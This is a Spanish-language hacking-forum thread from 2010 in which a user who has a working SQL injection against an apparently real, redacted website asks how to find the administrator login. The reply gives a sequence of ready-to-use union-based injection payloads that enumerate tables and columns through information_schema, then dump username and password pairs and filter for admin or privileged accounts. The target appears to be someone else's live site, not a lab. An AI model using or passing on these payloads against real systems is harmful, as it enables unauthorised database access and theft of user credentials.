elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda, no logro encontrar el nombre de administrador.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda, no logro encontrar el nombre de administrador.  (Leído 2,981 veces)
Kaosk.

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Ayuda, no logro encontrar el nombre de administrador.
« en: 18 Agosto 2010, 23:05 pm »

Muy buenas tardes, estoy haciendo pruebas de SQLi y esta ha sido la primera que me ha salido bien, hasta el momento ;-).
Pues el problema es que no encuentro ninguna tabla llamada "users,usuarios" o algo y ahí me quedoo entrabancado dejo la inyección:

(http://www.xxxx.xxx/info_page.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+1,1--) A partir de ahí que tengo que hacer para poder encontrar el usuario/administrador, un saludo y muchas gracias.
En línea

cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: Ayuda, no logro encontrar el nombre de administrador.
« Respuesta #1 en: 18 Agosto 2010, 23:40 pm »

Sacas todas las tablas, y buscas la de los usuarios:

Código:
union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+

A esa tabla la llamaremos 'usuarios'. Ahora sacas los campos de la tabla usuarios:

Código:
union+select+1,group_concat(column_name),3,4,5+from+information_schema.column+where+table_name='usuarios'+--+

Entre otros campos, tiene el campo 'login' y 'pwd', por ejemplo:

Código:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+--+

Sacará los usuarios. Si en alguno de los pasos no salen todos, es porque no caben, puedes usar 'limit' y sacarlos uno a uno, o usar este truco.

Si solo quieres el del admin, puedes añadir una cláusula where o ver si hay algún campo en la tabla que represente los privilegios del usuario.

Código:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+login+like+'%admin%'--+

Código:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+priv=1+--+

No seas malo...
En línea

Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ


Kaosk.

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Ayuda, no logro encontrar el nombre de administrador.
« Respuesta #2 en: 19 Agosto 2010, 09:54 am »

Muchas gracias :D
Tranquilo que no haré nada solo estoy practicando hehe.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
No logro encontrar handle a SysListView32 de taskmanager « 1 2 »
Programación Visual Basic
x64core 13 5,199 Último mensaje 28 Agosto 2011, 20:07 pm
por x64core
(AYUDA)COMO ENCONTRAR USUARIO Y CONTRASEÑA DE ADMINISTRADOR DE UN CHAT
Dudas Generales
MAZTER__DENIS 1 2,648 Último mensaje 21 Agosto 2014, 04:33 am
por engel lex
Retrasan un vuelo al encontrar una red wifi con el nombre ‘Galaxy Note7’
Noticias
wolfbcn 0 1,612 Último mensaje 23 Diciembre 2016, 21:48 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines